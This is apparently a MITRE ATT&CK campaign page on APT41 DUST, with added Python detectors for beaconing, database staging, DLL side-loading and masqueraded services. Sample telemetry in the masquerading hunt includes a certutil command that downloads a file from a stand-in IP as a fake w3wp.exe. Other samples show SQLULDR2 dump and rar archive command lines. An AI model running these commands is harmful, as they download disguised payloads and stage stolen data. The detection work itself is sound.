APT41 DUST

APT41 DUST was conducted by APT41 from 2023 to July 2024 against entities in Europe, Asia, and the Middle East. APT41 DUST targeted sectors such as shipping, logistics, and media for information gathering purposes. In APT41 DUST, APT41 used previously observed malware such as DUSTPAN alongside newly observed tools such as DUSTTRAP.[1]

ID: C0040
First Seen: January 2023 [1]
Last Seen: June 2024 [1]
Version: 1.0
Created: 16 September 2024
Last Modified: 21 September 2024

Groups

ID Name Description
G0096 APT41

APT41 DUST was conducted by APT41 from 2023 to July 2024.[1]

Techniques Used

Domain ID Name Use
Enterprise T1583 .007 Acquire Infrastructure: Serverless

APT41 DUST used infrastructure hosted behind Cloudflare, or Cloudflare Workers, for command and control.[1]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT41 DUST used HTTPS for command and control.[1]
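The Cloudflare Workers and HTTPS command-and-control entries above (T1583.007 and T1071.001) give no byte-level signature, but a Worker's default *.workers.dev hostname and the periodicity of an implant's check-ins are both visible in TLS connection logs. The following Python is an added example, not code from the Mandiant report or from MITRE ATT&CK: it groups Zeek ssl.log-style records by source host and SNI, keeps workers.dev destinations, and scores the regularity of the intervals between connections. All hostnames and timestamps are constructed; a custom domain fronted by Cloudflare cannot be identified from the SNI alone.

```python
"""Beacon-regularity check over TLS connection logs for Cloudflare Workers C2.
Added example; not from the report or MITRE.  Records are Zeek ssl.log-style
tuples (ts, source host, SNI), constructed here."""
import statistics
from collections import defaultdict

T0 = 1_700_000_000  # constructed epoch base

# Constructed sample.  Series 1: a 60 s beacon with small jitter to a
# hypothetical *.workers.dev host.  Series 2: irregular contact with another
# workers.dev host.  Series 3: bursty browsing to an ordinary site.
SAMPLE_SSL_LOG = [
    (T0 + 0,    "ws-114", "update-check.example.workers.dev"),
    (T0 + 61,   "ws-114", "update-check.example.workers.dev"),
    (T0 + 119,  "ws-114", "update-check.example.workers.dev"),
    (T0 + 181,  "ws-114", "update-check.example.workers.dev"),
    (T0 + 240,  "ws-114", "update-check.example.workers.dev"),
    (T0 + 299,  "ws-114", "update-check.example.workers.dev"),
    (T0 + 0,    "ws-207", "cdn-assets.example.workers.dev"),
    (T0 + 5,    "ws-207", "cdn-assets.example.workers.dev"),
    (T0 + 200,  "ws-207", "cdn-assets.example.workers.dev"),
    (T0 + 210,  "ws-207", "cdn-assets.example.workers.dev"),
    (T0 + 900,  "ws-207", "cdn-assets.example.workers.dev"),
    (T0 + 10,   "ws-114", "www.example.com"),
    (T0 + 11,   "ws-114", "www.example.com"),
    (T0 + 11.5, "ws-114", "www.example.com"),
    (T0 + 12,   "ws-114", "www.example.com"),
    (T0 + 300,  "ws-114", "www.example.com"),
    (T0 + 301,  "ws-114", "www.example.com"),
]


def is_workers_host(sni):
    """Default hostname of a Cloudflare Worker.  Custom domains fronted by
    Cloudflare are not identifiable from the SNI alone."""
    return sni.lower().endswith(".workers.dev")


def interval_stats(timestamps):
    """Mean and coefficient of variation (stddev / mean) of inter-connection gaps."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if not gaps:
        return 0.0, float("inf")
    mean = statistics.mean(gaps)
    if mean <= 0:
        return mean, float("inf")
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(records, min_conns=4, max_cv=0.2, workers_only=True):
    """Flag (source, SNI) series whose connection intervals are nearly constant."""
    series = defaultdict(list)
    for ts, src, sni in records:
        if workers_only and not is_workers_host(sni):
            continue
        series[(src, sni.lower())].append(ts)
    hits = []
    for (src, sni), times in series.items():
        if len(times) < min_conns:
            continue
        mean, cv = interval_stats(times)
        if cv <= max_cv:
            hits.append({"src": src, "sni": sni, "connections": len(times),
                         "mean_interval": round(mean), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_SSL_LOG):
        print(hit)
```

Tune min_conns and max_cv to the environment: sleep jitter above roughly 20 percent pushes the coefficient of variation past the default cutoff, so pair this with a rarity or volume filter on the destination rather than relying on regularity alone.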

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration.[1]

Enterprise T1119 Automated Collection

APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information.[1]

Enterprise T1586 .003 Compromise Accounts: Cloud Accounts

APT41 DUST used compromised Google Workspace accounts for command and control.[1]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT41 DUST used Windows Services with names such as Windows Defend for persistence of DUSTPAN.[1]

Enterprise T1213 Data from Information Repositories

APT41 DUST collected data from victim Oracle databases using SQLULDR2.[1]

Enterprise T1074 .001 Data Staged: Local Data Staging

APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration.[1]
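The three entries above (rar compression, Oracle data collected with SQLULDR2, and CSV staging) describe one chain on a single host. The following Python is an added example, not the report's own tooling, that correlates that chain from process-creation events: a SQLULDR2 run whose file= argument names a CSV, followed within a time window by a rar add command on the same host that packs that CSV. The event fields, hosts, paths and the SQLULDR2 and rar command lines are constructed for the example; rar's -p/-hp password switch is treated as an extra signal.

```python
"""Correlate the collection and staging chain: SQLULDR2 export to local CSV,
then rar compression of that CSV.  Added example, not from the report; events
are a constructed process-creation shape with Sysmon Event ID 1 style fields."""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample telemetry.  Hosts, paths and accounts are made up and
# credentials are written as REDACTED rather than as realistic values.
EVENTS = [
    {"host": "db-app01", "time": "2024-03-04T02:11:09",
     "image": r"C:\Users\Public\sqluldr2.exe",
     "cmdline": r'sqluldr2.exe user=app/REDACTED@ORCL query="select * from customers" file=C:\Users\Public\cust.csv'},
    {"host": "db-app01", "time": "2024-03-04T02:14:52",
     "image": r"C:\Users\Public\rar.exe",
     "cmdline": r"rar.exe a -hpREDACTED C:\Users\Public\c.rar C:\Users\Public\cust.csv"},
    # export with no archive step following it
    {"host": "db-app02", "time": "2024-03-04T03:00:00",
     "image": r"C:\oracle\tools\sqluldr2.exe",
     "cmdline": r'sqluldr2.exe user=rep/REDACTED@ORCL query="select * from orders" file=D:\exports\daily.csv'},
    # rar run with no database export behind it
    {"host": "build07", "time": "2024-03-04T03:05:00",
     "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmdline": r"Rar.exe a D:\artifacts\release.rar D:\artifacts\bin"},
]

FILE_ARG = re.compile(r'file=("?)([^"\s]+)\1', re.IGNORECASE)


def _basename(path):
    return PureWindowsPath(path.strip('"')).name.lower()


def _parent(path):
    return str(PureWindowsPath(path.strip('"')).parent).lower()


def parse_export(ev):
    """SQLULDR2 invocation -> path of the CSV it writes, else None."""
    if _basename(ev["image"]) != "sqluldr2.exe":
        return None
    m = FILE_ARG.search(ev["cmdline"])
    return m.group(2) if m else None


def parse_archive(ev):
    """rar 'a' (add) invocation -> (archive, file operands, password flag), else None.
    Whitespace split is naive about quoted paths; good enough for the sample."""
    if _basename(ev["image"]) != "rar.exe":
        return None
    tokens = ev["cmdline"].split()
    if len(tokens) < 3 or tokens[1].lower() != "a":
        return None
    switches = [t for t in tokens[2:] if t.startswith("-")]
    operands = [t for t in tokens[2:] if not t.startswith("-")]
    if not operands:
        return None
    password = any(s.lower().startswith(("-p", "-hp")) for s in switches)
    return operands[0], operands[1:], password


def _covers(file_arg, csv_path):
    """Does a rar operand name the CSV, its directory, or a CSV glob in that directory?"""
    arg = file_arg.strip('"').lower()
    csv = csv_path.strip('"').lower()
    if arg == csv or arg == _parent(csv):
        return True
    return _parent(arg) == _parent(csv) and ("*" in arg or arg.endswith(".csv"))


def find_staging_chains(events, window=timedelta(hours=4)):
    """Pair each rar run with an earlier SQLULDR2 export on the same host whose CSV it packs."""
    exports = []  # (host, time, csv path)
    chains = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        csv = parse_export(ev)
        if csv:
            exports.append((ev["host"], t, csv))
            continue
        arch = parse_archive(ev)
        if not arch:
            continue
        archive, file_args, password = arch
        for host, t_exp, csv_path in exports:
            if host != ev["host"] or not (timedelta(0) <= t - t_exp <= window):
                continue
            if any(_covers(a, csv_path) for a in file_args):
                chains.append({"host": host, "csv": csv_path, "archive": archive,
                               "password_protected": password,
                               "seconds_between": int((t - t_exp).total_seconds())})
    return chains


if __name__ == "__main__":
    for chain in find_staging_chains(EVENTS):
        print(chain)
```

The export alone is noisy on database hosts where SQLULDR2 is part of routine jobs; the value is in the pairing, and the window should be sized to how long the actor is seen to dwell between collection and staging rather than left at the default.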

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

APT41 DUST used HTTPS for command and control.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

APT41 DUST exfiltrated collected information to OneDrive.[1]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP.[1]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller.[1]
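For the two hijack entries above, the practical check is whether a process loaded a DLL from its own directory, whether that directory lies outside the standard install trees, and whether the DLL's signer matches the host executable's. The following Python is an added example, not from the report: each record is a constructed join of an image-load event with signer details for both the EXE and the DLL (a shape you would assemble from EDR telemetry, not a native Sysmon event). The uninstaller file name, DLL names, publishers and the small System32 inventory in the sample are placeholders.

```python
"""Flag DLL side-loading / search-order hijacking candidates from image-load
records joined with signer information.  Added example; not from the report."""
from pathlib import PureWindowsPath

# Directories in which loading a DLL from the EXE's own directory is ordinary.
TRUSTED_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64",
                 r"c:\program files", r"c:\program files (x86)")
# Constructed stand-in for a known-good System32 inventory; seed it from a real listing.
SYSTEM32_DLLS = {"version.dll", "wininet.dll", "kernel32.dll", "dbghelp.dll"}

IMAGE_LOADS = [
    # Constructed: a vendor-signed uninstaller copied to a public directory loads a
    # DLL that shares a system DLL's name and carries another publisher's signature.
    {"host": "web01", "process": r"C:\Users\Public\Libraries\uninst.exe",
     "process_signer": "AhnLab, Inc.", "dll": r"C:\Users\Public\Libraries\version.dll",
     "dll_signed": True, "dll_signer": "Example Games Co."},
    # Constructed: the same EXE loading the real kernel32 from System32, not a side-load.
    {"host": "web01", "process": r"C:\Users\Public\Libraries\uninst.exe",
     "process_signer": "AhnLab, Inc.", "dll": r"C:\Windows\System32\kernel32.dll",
     "dll_signed": True, "dll_signer": "Microsoft Windows"},
    # Constructed: an installed product loading its own helper DLL, benign.
    {"host": "web01", "process": r"C:\Program Files\Contoso\app.exe",
     "process_signer": "Contoso Ltd", "dll": r"C:\Program Files\Contoso\helper.dll",
     "dll_signed": True, "dll_signer": "Contoso Ltd"},
    # Constructed: an unsigned tool in Downloads picking up an unsigned wininet.dll beside it.
    {"host": "ws-044", "process": r"C:\Users\alice\Downloads\tool.exe",
     "process_signer": None, "dll": r"C:\Users\alice\Downloads\wininet.dll",
     "dll_signed": False, "dll_signer": None},
]


def _parent(path):
    return str(PureWindowsPath(path).parent).lower()


def _name(path):
    return PureWindowsPath(path).name.lower()


def _under(directory, roots):
    return any(directory == r or directory.startswith(r + "\\") for r in roots)


def assess(rec):
    """Reasons this load looks like a side-load; empty list if it does not."""
    if _parent(rec["dll"]) != _parent(rec["process"]):
        return []  # DLL was not resolved from the EXE's own directory
    reasons = ["dll_from_exe_dir"]
    if not _under(_parent(rec["dll"]), TRUSTED_ROOTS):
        reasons.append("untrusted_directory")
    if not rec["dll_signed"] or rec["dll_signer"] != rec["process_signer"]:
        reasons.append("signer_mismatch")
    if _name(rec["dll"]) in SYSTEM32_DLLS:
        reasons.append("shadows_system_dll")
    # Same-directory loading alone is how most installed software works;
    # report only when at least one aggravating condition is present.
    return reasons if len(reasons) > 1 else []


def find_sideloads(records):
    hits = []
    for rec in records:
        reasons = assess(rec)
        if reasons:
            hits.append({"host": rec["host"], "process": rec["process"],
                         "dll": rec["dll"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_sideloads(IMAGE_LOADS):
        print(hit)
```

A valid signature on the DLL is not an exoneration here: the page records that DUSTTRAP was signed with stolen certificates, which is why the check compares the DLL's publisher with the host executable's rather than asking only whether the DLL is signed.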

Enterprise T1070 .004 Indicator Removal: File Deletion

APT41 DUST deleted various artifacts from victim systems following use.[1]

Enterprise T1105 Ingress Tool Transfer

APT41 DUST involved executing certutil.exe via a web shell to download the DUSTPAN dropper.[1]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe.[1]
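The Windows Service, Ingress Tool Transfer and Masquerading entries above (a service named "Windows Defend", certutil.exe launched through a web shell, DUSTPAN named w3wp.exe or conn.exe) give three concrete hunting conditions. The following Python is an added example, not from the report or MITRE: it runs those checks over constructed process-creation and service-install records, with an ancestry list standing in for the parent chain an EDR would supply. The legitimate locations it assumes are the IIS inetsrv directory for w3wp.exe and the Microsoft Defender Platform and Program Files trees for Defender's own binaries; conn.exe has no legitimate location mapped, so every occurrence is reported.

```python
"""Hunt for the DUSTPAN delivery and persistence chain in endpoint telemetry.
Added example, not from the report or MITRE; record fields are a constructed,
EDR-agnostic shape."""
from pathlib import PureWindowsPath

WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe", "php-cgi.exe"}
# Expected directories for the binary names the page says DUSTPAN borrowed.
# conn.exe has no legitimate Windows location, so any occurrence is reported.
EXPECTED_DIRS = {
    "w3wp.exe": {r"c:\windows\system32\inetsrv", r"c:\windows\syswow64\inetsrv"},
    "conn.exe": set(),
}
# Trees in which Microsoft Defender's own service binaries live.
DEFENDER_ROOTS = (r"c:\programdata\microsoft\windows defender",
                  r"c:\program files\windows defender")

# Constructed sample telemetry (hosts and paths are made up; 203.0.113.0/24 is a
# documentation address range).
PROCESS_EVENTS = [
    {"host": "web01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.9/x.txt C:\Windows\Temp\w3wp.exe",
     "ancestry": [r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe"]},
    {"host": "web01", "image": r"C:\Windows\Temp\w3wp.exe", "cmdline": "w3wp.exe",
     "ancestry": [r"C:\Windows\System32\services.exe"]},
    {"host": "web01", "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "w3wp.exe -ap DefaultAppPool",
     "ancestry": [r"C:\Windows\System32\svchost.exe"]},
    {"host": "adm02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer",
     "ancestry": [r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"]},
]
SERVICE_EVENTS = [
    {"host": "web01", "service_name": "Windows Defend", "display_name": "Windows Defend",
     "image_path": r"C:\Windows\Temp\w3wp.exe"},
    {"host": "adm02", "service_name": "WinDefend",
     "display_name": "Microsoft Defender Antivirus Service",
     "image_path": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24030.9-0\MsMpEng.exe"'},
]


def _name(path):
    return PureWindowsPath(path.strip('"')).name.lower()


def _parent(path):
    return str(PureWindowsPath(path.strip('"')).parent).lower()


def _under(directory, roots):
    return any(directory == r or directory.startswith(r + "\\") for r in roots)


def certutil_from_webshell(ev):
    """certutil fetching a URL with a web server worker somewhere in its ancestry."""
    cmd = ev["cmdline"].lower()
    if _name(ev["image"]) != "certutil.exe" or "urlcache" not in cmd or "http" not in cmd:
        return False
    return any(_name(p) in WEB_WORKERS for p in ev["ancestry"])


def masqueraded_binary(ev):
    """A process carrying a borrowed name but running outside its expected directory."""
    name = _name(ev["image"])
    return name in EXPECTED_DIRS and _parent(ev["image"]) not in EXPECTED_DIRS[name]


def defender_lookalike_service(ev):
    """A service named like Defender whose binary is not in Defender's install trees."""
    names = (ev["service_name"] + " " + ev["display_name"]).lower()
    return "defend" in names and not _under(_parent(ev["image_path"]), DEFENDER_ROOTS)


def hunt(process_events, service_events):
    hits = []
    for ev in process_events:
        if certutil_from_webshell(ev):
            hits.append((ev["host"], "certutil_from_webshell", ev["cmdline"]))
        if masqueraded_binary(ev):
            hits.append((ev["host"], "masqueraded_binary", ev["image"]))
    for ev in service_events:
        if defender_lookalike_service(ev):
            hits.append((ev["host"], "defender_lookalike_service", ev["service_name"]))
    return hits


if __name__ == "__main__":
    for host, kind, detail in hunt(PROCESS_EVENTS, SERVICE_EVENTS):
        print(f"{host}: {kind}: {detail}")
```

The service check keys on the binary's location rather than on the exact string "Windows Defend", so variations on the name are caught while Defender's own services (WinDefend, the network inspection service, and the Defender for Endpoint sensor under Program Files) are not.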

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

APT41 DUST used encrypted payloads that were decrypted and executed in memory.[1]

Enterprise T1588 .003 Obtain Capabilities: Code Signing Certificates

APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components.[1]

Enterprise T1596 .005 Search Open Technical Databases: Scan Databases

APT41 DUST used internet scan data for target development.[1]

Enterprise T1593 .002 Search Open Websites/Domains: Search Engines

APT41 DUST involved the use of search engines to research victim servers.[1]

Enterprise T1594 Search Victim-Owned Websites

APT41 DUST involved accessing external victim-owned websites for target development.[1]

Enterprise T1505 .003 Server Software Component: Web Shell

APT41 DUST involved the use of web shells such as ANTSWORD and BLUEBEAM for persistence.[1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads.[1]

Enterprise T1569 .002 System Services: Service Execution

APT41 DUST used Windows services to execute DUSTPAN.[1]

Enterprise T1102 Web Service

APT41 DUST used compromised Google Workspace accounts for command and control.[1]

Software

References